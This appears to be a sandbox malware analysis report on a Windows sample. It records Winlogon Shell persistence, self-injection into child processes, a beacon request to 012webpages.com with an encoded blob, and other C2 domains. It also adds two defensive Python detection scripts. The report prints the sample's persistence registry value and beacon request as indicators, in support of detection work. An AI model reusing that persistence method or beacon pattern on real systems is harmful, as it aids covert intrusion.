Analysis
- max time kernel: 141s
- max time network: 128s
- platform: windows10-2004_x64
- resource: win10v2004-20240802-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 21-09-2024 00:42
Static task: static1
Behavioral task behavioral1: sample eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe, resource win7-20240903-en
Behavioral task behavioral2: sample eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe, resource win10v2004-20240802-en (the signatures, process tree and network records below come from this task)
General
- Target: eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe
- Size: 162KB
- MD5: eec01efbbe0b7fda3816af7957024ff9
- SHA1: 63270a6182ba640a5cb6141fc6daabea1e2c1959
- SHA256: 45b2c7845f0ec06024b00543bbd17c008989a1361cdc50e7de40370232b9b628
- SHA512: d87cb29262d710e25aba7d782ba0917882daf92810f1cf73b27600b39c25e951cb5978d59a419b237b756dbfbc0f05fa0a185f7b5876d7a52bec5f70d8cf15f5
- SSDEEP: 3072:kkqseZj6FzYj+A3FBlLzhMgJCyNZn5g8JEfqcS+vhsP75w28NHSqstaEVG:v8j6FzY/RLzpNZn5gPq5+OPtwufta
Malware Config: none extracted
Signatures

- Modifies WinLogon for persistence (2 TTPs, 1 IoC; ATT&CK T1547.004, Winlogon Helper DLL)
  Process: eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe
  Set value (str): \REGISTRY\USER\S-1-5-21-2170637797-568393320-3232933035-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\50593\\C7061.exe"
  Winlogon starts every comma-separated entry of the Shell value at logon, so appending a second path after explorer.exe launches the dropped C7061.exe on each interactive logon of that user while the desktop still comes up normally. The value lives in the user's own hive (HKU), so writing it needs no elevation, and a default install defines Shell only under HKLM: a per-user Winlogon\Shell value existing at all is a strong hunt signal.

- UPX-packed code in memory (yara rule: upx; 9 matching memory dumps, behavioral2)
  behavioral2/memory/4924-2-0x0000000000400000-0x0000000000491000-memory.dmp
  behavioral2/memory/3084-13-0x0000000000400000-0x0000000000491000-memory.dmp
  behavioral2/memory/3084-15-0x0000000000400000-0x0000000000491000-memory.dmp
  behavioral2/memory/4924-16-0x0000000000400000-0x0000000000491000-memory.dmp
  behavioral2/memory/4924-17-0x0000000000400000-0x000000000048E000-memory.dmp
  behavioral2/memory/1272-84-0x0000000000400000-0x0000000000491000-memory.dmp
  behavioral2/memory/1272-86-0x0000000000400000-0x0000000000491000-memory.dmp
  behavioral2/memory/4924-87-0x0000000000400000-0x0000000000491000-memory.dmp
  behavioral2/memory/4924-179-0x0000000000400000-0x0000000000491000-memory.dmp
  All three instances of the sample (PIDs 4924, 3084 and 1272) map the same 0x400000-0x491000 image region and the rule keeps matching throughout the run, so the packer signature stays present in the in-memory image; the 0x400000-0x48E000 entry for PID 4924 is a slightly shorter capture of the same base address. Any of these dumps is a reasonable starting point for static work on the unpacked code.

- System Location Discovery: System Language Discovery (1 TTP, 3 IoCs; ATT&CK T1614.001)
  Attempt to gather information about the system language of a victim in order to infer the geographical location of that host.
  Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language, by eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe (3 times)
  Malware commonly reads this key to skip hosts in particular locales; the report records only that the key was opened, not which value was read or whether execution branched on it.

- Suspicious use of WriteProcessMemory (6 IoCs)
  PID 4924 (eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe) wrote to memory of PID 3084 (procid_target 94), 3 times
  PID 4924 (eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe) wrote to memory of PID 1272 (procid_target 98), 3 times
  The writer is the original process and both targets are freshly created copies of the same binary (see the process tree), the usual shape of a parent injecting into, or handing state to, its own child. The report does not show what was written.
Processes

1. C:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe
   Command line: "C:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe"
   PID: 4924
   - Modifies WinLogon for persistence
   - System Location Discovery: System Language Discovery
   - Suspicious use of WriteProcessMemory

   2. C:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe startC:\Program Files (x86)\LP\6105\473.exe%C:\Program Files (x86)\LP\6105
      PID: 3084
      - System Location Discovery: System Language Discovery

   2. C:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe
      Command line: C:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe startC:\Program Files (x86)\93ADD\lvvm.exe%C:\Program Files (x86)\93ADD
      PID: 1272
      - System Location Discovery: System Language Discovery

1. C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
   Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4344,i,11391966286255097843,10588851088187498028,262144 --variations-seed-version --mojo-platform-channel-handle=3904 /prefetch:8
   PID: 1140

The sample re-executes its own image twice, each time with a single argument of the form start<exe>%<dir> that names a path under C:\Program Files (x86) (473.exe in LP\6105, lvvm.exe in 93ADD). The report lists no file writes to those paths and no process ever runs from them, so in this run the staged copies were not observed executing; the argument format itself (the literal prefix "start" glued to a drive-letter path, a "%" separating executable from directory) is a usable command-line detection. The msedge.exe utility process is a separate top-level process with no signatures and is sandbox background activity.
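Two checks a responder would run on hosts for the behaviours recorded above (the extra Winlogon Shell entry and the start<exe>%<dir> child command lines), written as an added example in Python; this is not code from the sandbox report or from the sample. The registry value and the two command lines are copied from the report; the suspicious-path heuristic, the function names and the optional live read through winreg (which only does anything on Windows) are this example's own assumptions.

```python
"""Host-side checks for the two behaviours in the report above: the extra
entry appended to the per-user Winlogon Shell value, and the
"start<exe>%<dir>" argument the sample passes to copies of itself.

Added example, not code from the sandbox report or the sample.  The two
SAMPLE_* inputs are copied from the report; the heuristics, function names
and the optional live-registry read are this example's own assumptions.
"""
import re
from typing import Optional

# Constructed from the report: the value written to HKU\<SID>\...\Winlogon\Shell
SAMPLE_SHELL_VALUE = "explorer.exe,C:\\Users\\Admin\\AppData\\Roaming\\50593\\C7061.exe"

# Constructed from the report: command lines of the two child processes
SAMPLE_CHILD_CMDLINES = [
    r"C:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe"
    r" startC:\Program Files (x86)\LP\6105\473.exe%C:\Program Files (x86)\LP\6105",
    r"C:\Users\Admin\AppData\Local\Temp\eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe"
    r" startC:\Program Files (x86)\93ADD\lvvm.exe%C:\Program Files (x86)\93ADD",
]

EXPECTED_SHELL = "explorer.exe"
# Assumption (hunting heuristic, not from the report): a shell entry under a
# user-writable directory is not something an administrator configures.
SUSPICIOUS_ROOTS = ("\\appdata\\roaming\\", "\\appdata\\local\\", "\\temp\\", "\\programdata\\")

# Matches "start" immediately followed by <exe>%<dir>, both drive-letter paths.
START_ARG = re.compile(r"\bstart(?P<exe>[A-Za-z]:\\[^%]+?)%(?P<dir>[A-Za-z]:\\.+)$")


def parse_shell_value(value: str) -> list:
    """Winlogon launches every comma-separated entry of Shell, so split on commas."""
    return [entry.strip() for entry in value.split(",") if entry.strip()]


def extra_shell_entries(value: str) -> list:
    """Entries other than the stock explorer.exe shell."""
    return [e for e in parse_shell_value(value) if e.strip('"').lower() != EXPECTED_SHELL]


def classify_entry(entry: str) -> str:
    low = entry.strip('"').lower()
    if any(root in low for root in SUSPICIOUS_ROOTS):
        return "suspicious: shell entry under a user-writable path"
    if "\\" not in low:
        return "review: bare name resolved through the search path"
    return "review: extra shell entry"


def audit_shell_value(value: str) -> list:
    """(entry, verdict) for every non-default entry; an empty list means the value is clean."""
    return [(e, classify_entry(e)) for e in extra_shell_entries(value)]


def parse_start_argument(cmdline: str) -> Optional[dict]:
    """Pull the staged executable and its directory out of a start<exe>%<dir> argument."""
    m = START_ARG.search(cmdline)
    if not m:
        return None
    exe, directory = m.group("exe"), m.group("dir")
    return {"exe": exe, "dir": directory,
            "exe_in_dir": exe.lower().startswith(directory.lower().rstrip("\\") + "\\")}


def read_live_shell_values() -> dict:
    """Shell values from HKLM and every loaded user hive (Windows only; {} elsewhere)."""
    try:
        import winreg
    except ImportError:
        return {}
    subkey = r"SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
    targets = [("HKLM", winreg.HKEY_LOCAL_MACHINE, subkey)]
    i = 0
    while True:
        try:
            sid = winreg.EnumKey(winreg.HKEY_USERS, i)
        except OSError:
            break
        i += 1
        targets.append((f"HKU\\{sid}", winreg.HKEY_USERS, sid + "\\" + subkey))
    found = {}
    for label, hive, path in targets:
        try:
            with winreg.OpenKey(hive, path) as key:
                found[label] = winreg.QueryValueEx(key, "Shell")[0]
        except OSError:
            continue
    return found


if __name__ == "__main__":
    shells = read_live_shell_values() or {"report sample": SAMPLE_SHELL_VALUE}
    for where, value in shells.items():
        for entry, verdict in audit_shell_value(value):
            print(f"{where}: {entry} -> {verdict}")
    for cmdline in SAMPLE_CHILD_CMDLINES:
        print(parse_start_argument(cmdline))
```

On a Windows host the script walks HKLM and every loaded user hive; anywhere else it falls back to the value from the report. Because a default install has no per-user Shell value, any audit hit under HKU deserves a look even when the path is not under AppData, and the start<exe>%<dir> parser is the piece to lift into a command-line rule.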
Network

DNS (all queries to 8.8.8.8:53)
- PTR 8.8.8.8.in-addr.arpa -> dns.google
- PTR 209.205.72.20.in-addr.arpa -> (empty response)
- PTR 79.190.18.2.in-addr.arpa -> a2-18-190-79.deploy.static.akamaitechnologies.com
- PTR 69.31.126.40.in-addr.arpa -> (empty response)
- PTR 95.221.229.192.in-addr.arpa -> (empty response)
- A 012webpages.com -> 103.27.200.238
- PTR 238.200.27.103.in-addr.arpa -> th238.ruk-com.in.th
- PTR 154.239.44.20.in-addr.arpa -> (empty response)
- A regfeedbackaccess.com -> (empty response)
- A renamesys5.com -> (empty response)
- PTR 26.165.165.52.in-addr.arpa -> (empty response)
- PTR 241.42.69.40.in-addr.arpa -> (empty response)
- A renamesys5.com -> (empty response)
- PTR 19.229.111.52.in-addr.arpa -> (empty response)
- A www.google.com -> 172.217.169.4
- PTR 4.169.217.172.in-addr.arpa -> lhr25s26-in-f4.1e100.net

The forward lookups are the part worth keeping. 012webpages.com resolved and was contacted immediately afterwards; regfeedbackaccess.com and renamesys5.com (queried twice) returned nothing, so they are further contact points that were dead or unregistered at analysis time and belong on a watch list in case they come alive later. The reverse lookups are the sandbox resolving addresses it saw (Microsoft, Akamai and Google ranges), carry no process attribution in the report, and are background noise.

HTTP

1. eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe -> 103.27.200.238:80
   Request:
   GET /christian14.jpg?pr=gHZutDyMv5rJfCG1J8K%2B1MWCJbP4lltXIA%3D%3D HTTP/1.0
   Connection: close
   Host: 012webpages.com
   Accept: */*
   User-Agent: chrome/9.0

   Response:
   HTTP/1.1 301 Moved Permanently
   Content-Type: text/html
   Content-Length: 166
   Connection: close
   Location: http://www.012webpages.com/christian14.jpg?pr=gHZutDyMv5rJfCG1J8K%2B1MWCJbP4lltXIA%3D%3D
   Server: Nginx_Rc-Cr
   etag: on

   This is the sample's own beacon: a hand-rolled HTTP/1.0 request, a User-Agent of "chrome/9.0" that no real browser sends (Chrome's starts with Mozilla/5.0), and a .jpg URL carrying a URL-encoded base64 blob (gHZutDyMv5rJfCG1J8K+1MWCJbP4lltXIA== once decoded from the query string, 25 bytes of opaque data that the report does not interpret). The server answered with a redirect to the www. host and the sample never followed it, so no second-stage content was retrieved in this run. The User-Agent string and the image-path-plus-blob shape are the durable indicators here; the domain and address are cheap for the operator to rotate.

2. (no process attributed) -> 172.217.169.4:80
   Request:
   GET / HTTP/1.0
   Connection: close
   Host: www.google.com
   Accept: */*

   Response:
   HTTP/1.0 302 Found
   x-hallmonitor-challenge: CgwIya24twYQtsmm4QESBMJuDUY
   Content-Type: text/html; charset=UTF-8
   Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-NkUr1Scfn-L7lHPCotx_tQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
   Date: Sat, 21 Sep 2024 00:43:53 GMT
   Server: gws
   Content-Length: 396
   X-XSS-Protection: 0
   X-Frame-Options: SAMEORIGIN
   Set-Cookie: AEC=AVYB7cqVOvUMhfgcBaL9I8sVV3_Nv3lkAeXZL-RK95RRyXWkpepz8ugFvCA; expires=Thu, 20-Mar-2025 00:43:53 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax

3. (no process attributed) -> 172.217.169.4:80
   Request:
   GET / HTTP/1.1
   Connection: close
   Pragma: no-cache
   Host: www.google.com

   Response:
   HTTP/1.1 302 Found
   x-hallmonitor-challenge: CgsIyq24twYQ3-ToAxIEwm4NRg
   Content-Type: text/html; charset=UTF-8
   Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-9vyNQxkRdFAeQlg2ahXV9g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
   Date: Sat, 21 Sep 2024 00:43:54 GMT
   Server: gws
   Content-Length: 396
   X-XSS-Protection: 0
   X-Frame-Options: SAMEORIGIN
   Set-Cookie: AEC=AVYB7cqjSP8j2uHDSk98fr2GzQBTiDGM1nnz7jNkhp0Crjfe43Or6SUm8g; expires=Thu, 20-Mar-2025 00:43:54 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
   Connection: close

4. eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe -> 172.217.169.4:80
   Request:
   GET /sorry/index?continue=http://www.google.com/&q=EgTCbg1GGMmtuLcGIjCKz9fCktDJEEfyJPL-x8dYHJHyECOWSgxdR7h8g1fXH61MTuuJjYZhCzQqlVsXrscyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
   Connection: close
   Pragma: no-cache
   Host: www.google.com

   Response:
   HTTP/1.1 429 Too Many Requests
   Pragma: no-cache
   Expires: Fri, 01 Jan 1990 00:00:00 GMT
   Cache-Control: no-store, no-cache, must-revalidate
   Content-Type: text/html
   Server: HTTP server (unknown)
   Content-Length: 3052
   X-XSS-Protection: 0
   Connection: close

   The www.google.com traffic is a connectivity check. The 302 to /sorry/index and the 429 that follows mean Google's abuse filter had already rate-limited the sandbox's egress address; that is analysis-infrastructure noise rather than sample behaviour, but a "can I reach the internet" test by the sample would still have succeeded, since the TCP connection and an HTTP response both came back.
-
Flows (bytes sent / received, packets sent / received)

- 103.27.200.238:80, http, eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe: 388 B / 641 B, 5 / 5
  GET http://012webpages.com/christian14.jpg?pr=gHZutDyMv5rJfCG1J8K%2B1MWCJbP4lltXIA%3D%3D -> 301
- 172.217.169.4:80, http: 302 B / 1.5 kB, 5 / 5
  GET http://www.google.com/ -> 302
- 172.217.169.4:80, http: 307 B / 1.5 kB, 5 / 5
  GET http://www.google.com/ -> 302
- 172.217.169.4:80, http, eec01efbbe0b7fda3816af7957024ff9_JaffaCakes118.exe: 526 B / 3.6 kB, 6 / 7
  GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgTCbg1GGMmtuLcGIjCKz9fCktDJEEfyJPL-x8dYHJHyECOWSgxdR7h8g1fXH61MTuuJjYZhCzQqlVsXrscyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM -> 429
- 8.8.8.8:53, dns: 72 B / 158 B, 1 / 1, PTR 209.205.72.20.in-addr.arpa
- 8.8.8.8:53, dns: 66 B / 90 B, 1 / 1, PTR 8.8.8.8.in-addr.arpa
- 8.8.8.8:53, dns: 70 B / 133 B, 1 / 1, PTR 79.190.18.2.in-addr.arpa
- 8.8.8.8:53, dns: 71 B / 157 B, 1 / 1, PTR 69.31.126.40.in-addr.arpa
- 8.8.8.8:53, dns: 73 B / 144 B, 1 / 1, PTR 95.221.229.192.in-addr.arpa
- 8.8.8.8:53, dns: 61 B / 77 B, 1 / 1, A 012webpages.com -> 103.27.200.238
- (unlabelled flow): 112 B sent, 2 packets, no response recorded
- 8.8.8.8:53, dns: 73 B / 106 B, 1 / 1, PTR 238.200.27.103.in-addr.arpa
- 8.8.8.8:53, dns: 72 B / 158 B, 1 / 1, PTR 154.239.44.20.in-addr.arpa
- 8.8.8.8:53, dns: 67 B / 140 B, 1 / 1, A regfeedbackaccess.com
- 8.8.8.8:53, dns: 60 B / 133 B, 1 / 1, A renamesys5.com
- 8.8.8.8:53, dns: 72 B / 146 B, 1 / 1, PTR 26.165.165.52.in-addr.arpa
- 8.8.8.8:53, dns: 71 B / 145 B, 1 / 1, PTR 241.42.69.40.in-addr.arpa
- 8.8.8.8:53, dns: 60 B / 133 B, 1 / 1, A renamesys5.com
- 8.8.8.8:53, dns: 72 B / 158 B, 1 / 1, PTR 19.229.111.52.in-addr.arpa
- 8.8.8.8:53, dns: 60 B / 76 B, 1 / 1, A www.google.com -> 172.217.169.4
- 8.8.8.8:53, dns: 72 B / 110 B, 1 / 1, PTR 4.169.217.172.in-addr.arpa
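The two network observations a detection engineer would want to turn into logic are the shape of the 012webpages.com request and the forward lookups that got no answer. Below is an added example in Python that does both; it is not code from the sandbox report. The request text and the DNS rows are constructed from the report's data (verbatim headers, PTR noise left out), and the scoring rules are this example's own assumptions about what separates a hand-rolled beacon from browser traffic.

```python
"""Triage the report's network records: score the HTTP request to
012webpages.com for beacon-like traits and list the A queries that never
resolved.  Added example, not from the report; the request text and DNS rows
are constructed from the report's data, and the scoring rules are this
example's own assumptions.
"""
import base64
import re
from typing import Optional
from urllib.parse import parse_qs, urlsplit

# Constructed from the report: the sample's first request, headers verbatim.
SAMPLE_REQUEST = (
    "GET /christian14.jpg?pr=gHZutDyMv5rJfCG1J8K%2B1MWCJbP4lltXIA%3D%3D HTTP/1.0\r\n"
    "Connection: close\r\n"
    "Host: 012webpages.com\r\n"
    "Accept: */*\r\n"
    "User-Agent: chrome/9.0\r\n"
    "\r\n"
)

# Constructed from the report's DNS table: (name, type, answers); PTR noise omitted.
SAMPLE_DNS = [
    ("012webpages.com", "A", ["103.27.200.238"]),
    ("regfeedbackaccess.com", "A", []),
    ("renamesys5.com", "A", []),
    ("renamesys5.com", "A", []),
    ("www.google.com", "A", ["172.217.169.4"]),
]

IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif")
B64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")


def parse_request(raw: str) -> dict:
    """Split a raw HTTP request into method, target, version and lower-cased headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def decode_if_base64(s: str) -> Optional[bytes]:
    """Decoded bytes if s is well-formed base64 carrying at least 16 bytes, else None."""
    if len(s) % 4 or not B64_RE.fullmatch(s):
        return None
    data = base64.b64decode(s)
    return data if len(data) >= 16 else None


def score_request(raw: str) -> list:
    """Human-readable reasons this request looks like malware beaconing (empty = nothing odd)."""
    req = parse_request(raw)
    reasons = []
    ua = req["headers"].get("user-agent", "")
    if not ua:
        reasons.append("no User-Agent header")
    elif not ua.startswith("Mozilla/"):
        # Every mainstream browser, Chrome included, starts its UA with Mozilla/5.0.
        reasons.append(f"non-browser User-Agent {ua!r}")
    if req["version"] == "HTTP/1.0":
        reasons.append("HTTP/1.0 request, which current browsers do not send")
    parts = urlsplit(req["target"])
    if parts.path.lower().endswith(IMAGE_EXTS) and parts.query:
        # parse_qs URL-decodes, so %2B and %3D come back as '+' and '='.
        for key, values in parse_qs(parts.query).items():
            for v in values:
                blob = decode_if_base64(v)
                if blob is not None:
                    reasons.append(f"image URL carries a {len(blob)}-byte base64 blob in '{key}'")
    return reasons


def unanswered_queries(records) -> list:
    """Distinct A-record names that returned no address, in first-seen order."""
    names = []
    for name, rtype, answers in records:
        if rtype == "A" and not answers and name not in names:
            names.append(name)
    return names


if __name__ == "__main__":
    for reason in score_request(SAMPLE_REQUEST):
        print("beacon trait:", reason)
    print("unresolved:", unanswered_queries(SAMPLE_DNS))
```

A rule built from this should key on the User-Agent and on the HTTP/1.0-plus-image-URL-with-blob combination rather than on 012webpages.com, which the operator can swap at will; the two unresolved names go on a watch list because a domain that is dead today can be registered and pointed at new infrastructure later.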
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 1KB
  MD5: 0f2c86bae2f5617e0e47a4f8ebbef206
  SHA1: 840379d071f858992d7f3eb9bb3f0ebdaa19519f
  SHA256: f18df6bfc3c0fe7529af4de64dd6e7324002a79610ab44534df2be17c49b7650
  SHA512: 6e258a80c8a4856a861bc3896680330b5436c5d3707f39e5196385c8f66557a9ed1ec0d241c025e460365fda00afb6ea4f5d57956cb216134946708ba43d0387

- Filesize: 600B
  MD5: 24a330fea5149c38c9a854a459b05cd0
  SHA1: d7a40188cd3a7d4a9e71f273e5d6a786f6e0a253
  SHA256: fc251b86d0cdf02ec39b4744dd375e7647d90f52a7ccc4b41d1e171e44daa9c6
  SHA512: 3a89e3b0e545f4cc938a3f7ab7766efc9e6ead49f3e54cf84a9569a998be26feb50e4a8cb162f6235dfd301737945c0bb6cf2b5bccdddeb980a3e45cd1e90dca

- Filesize: 996B
  MD5: c82169b3edcbcf463606fe4ec0e20d89
  SHA1: fa1b24f38d80c181a2bac5e3f94fd6c368e101aa
  SHA256: d4dcd80183696a1721f9340cba9d0c5769d263710454961bff2c2e804362f129
  SHA512: a16ef847c158993717d961bcbc1d0ae38aef85297d47a998fcd964615516016c62bf4de1c1b1b3ac016fad95a6c6fd2248f07bb36bed1bc212d6ac0f4ddde4be

The report gives sizes and hashes only, with no names or paths for these three files. At 600 B to 1 KB they are far too small to be the staged executables named in the child command lines, so those files, if they were ever written, are not among the captured artifacts.